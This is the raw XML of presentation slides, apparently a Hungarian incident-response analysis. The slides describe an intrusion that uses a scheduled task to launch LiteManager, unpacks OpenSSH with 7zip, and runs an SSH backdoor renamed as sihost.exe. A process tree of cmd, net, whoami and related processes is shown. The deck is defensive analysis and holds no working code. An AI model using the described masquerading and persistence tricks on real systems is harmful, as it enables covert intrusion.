          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="5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082F54F-B826-168E-AEC0-B5147E146FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109618" y="2311692"/>
            <a:ext cx="7896802" cy="6465149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="1" spcCol="540000" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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4400" dirty="0" smtClean="0"/>
              <a:t>Ütemezett feladat a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1" smtClean="0"/>
              <a:t>LiteManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4400" dirty="0" smtClean="0"/>
              <a:t> futtatásához</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>LiteManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4400" dirty="0" smtClean="0"/>
              <a:t>használja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-260408">
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, az </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kicsomagolásához</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4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sihost.exe = ssh.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-260408">
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor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8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB02A34-79F8-3E7B-3D71-411F7E5516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78127" y="-67586"/>
            <a:ext cx="13425772" cy="1018950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95163A59-E238-C3E5-C500-116286D301D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11440206" y="2840670"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm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FB2FB845-1DEC-F15D-AAA4-8AA7BEA69D99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2849512" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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330D51BF-3334-4E9C-ED33-153C103ED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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71F8AC1F-E6B0-307A-CC64-A51E70E2610C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="2404204" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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cmd.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(37880)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F05A5BB-807D-A66A-5FEC-AE23E7256AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12181523" y="3449921"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr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29D51067-5CB4-27DB-07ED-5D6A468BB57D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2618482" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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39" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47DE3B7F-B721-0D17-3201-6DB36D67282B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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conhost.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(27728)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326E467-1786-E273-90AD-72152AB5D23D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12189729" y="4067236"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr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E35D38A6-810D-86CC-8695-BDB370CF2F1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2618482" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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42" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBFD37A7-A1D3-D234-21D3-51AA63AB6FFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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net.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(47204)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B1DFA58-28A4-2D77-08E6-B390060B9B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12220253" y="5088062"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr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D932F632-CEE5-3815-DC9E-4361EAE81D2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2618482" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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45" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDC465A-B12D-C968-F8DA-73AC5DF1B56E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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whoami.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(37876)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9A18B4F-3EA5-1555-122B-DAEF439169AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12220253" y="6290497"/>
            <a:ext cx="4190988" cy="834390"/>
            <a:chOff x="12659398" y="6335553"/>
            <a:chExt cx="4190988" cy="83439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6A8BB85-0A3F-E4E7-BC8F-334540D4DB6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12659398" y="6335553"/>
              <a:ext cx="4190988" cy="834390"/>
              <a:chOff x="11554917" y="914400"/>
              <a:chExt cx="4190988" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr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E0B25F35-6E05-202A-29D6-F65C94EA48A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11554917" y="1103018"/>
                <a:ext cx="3663949" cy="468180"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="4274CC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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E69366-8BF5-27F7-9A4B-A77109CA7E46}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12677845" y="914400"/>
                <a:ext cx="3068060" cy="834390"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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sihost.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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(47784)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="Graphic 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E326D18-B984-369C-45B7-945053BAF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12791888" y="6651310"/>
              <a:ext cx="989944" cy="230987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3A2BED3-BB31-F23E-B367-D76468B7AB42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11440206" y="6964175"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr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D5A40EB4-D001-90E9-3D14-A263C1110F33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2849512" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Graphic 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEA3F84-5D94-386F-D2A6-1306A93D8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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F15C876-DBE9-FBF4-BA52-A2E89F613AC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="2404204" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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cmd.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(15312)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642F13A-E31B-8EB7-8921-BC668272A2C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12181523" y="7541896"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr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4C0EB70C-A2DD-9D27-DBA2-2E1CAA0C025E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2618482" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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60" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56ADB572-1A1B-F534-F3BC-CC65F179B1DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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conhost.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(17176)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84ADA32-5377-1C2A-DF3C-BFB9912C5B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12189729" y="8157794"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rounded Rectangle 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A727927-E62E-6F9C-DB08-ECF5D5E7C893}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2618482" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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63" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6DACCC-F968-50C4-BD6A-069F3AD293E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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net.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(42260)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8225F959-5972-7448-8F83-7DA8B1CB9EC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12934693" y="9358893"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Rounded Rectangle 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2239031F-5EAC-D109-8D04-A2CA6757353E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2618482" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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69" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B0EC81-331D-63AF-9C28-AE3DF30B3995}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12677845" y="914400"/>
              <a:ext cx="3068060" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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net1.exe (33464)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33C793A-F13C-F8E8-180F-2F54A1A471DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12217935" y="5716768"/>
            <a:ext cx="3510360" cy="834390"/>
            <a:chOff x="12294559" y="5737609"/>
            <a:chExt cx="3510360" cy="834390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4383ED1E-793A-A409-35B1-643BBB5F6E61}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12294559" y="5737609"/>
              <a:ext cx="3510360" cy="834390"/>
              <a:chOff x="12235545" y="914400"/>
              <a:chExt cx="3510360" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="Rounded Rectangle 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40DF872-F616-EEAB-C0B7-0C3B4A4C7F62}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235545" y="1103018"/>
                <a:ext cx="2983321" cy="468180"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395241C3-A531-838A-39DA-969A1716EB14}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12677845" y="914400"/>
                <a:ext cx="3068060" cy="834390"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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7za.exe (50928)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="71" name="Graphic 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B31E3E1-4E17-6BCA-E028-C9B191B34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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12399510" y="6021330"/>
              <a:ext cx="382490" cy="289766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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194D6527-4FC2-D2BE-56FF-BEA2365B4869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9911828" y="485452"/>
            <a:ext cx="3510360" cy="834390"/>
            <a:chOff x="10629374" y="471448"/>
            <a:chExt cx="3510360" cy="834390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518A707B-5C04-ACF4-DA35-1EBA0288698C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10629374" y="471448"/>
              <a:ext cx="3510360" cy="834390"/>
              <a:chOff x="12235545" y="914400"/>
              <a:chExt cx="3510360" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Rounded Rectangle 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123A8B53-8055-9DAB-3AC6-DE703C5606BB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235545" y="1103018"/>
                <a:ext cx="2983321" cy="468180"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF66773B-C3ED-04CF-C2AF-CD88C4FACBE6}"/>
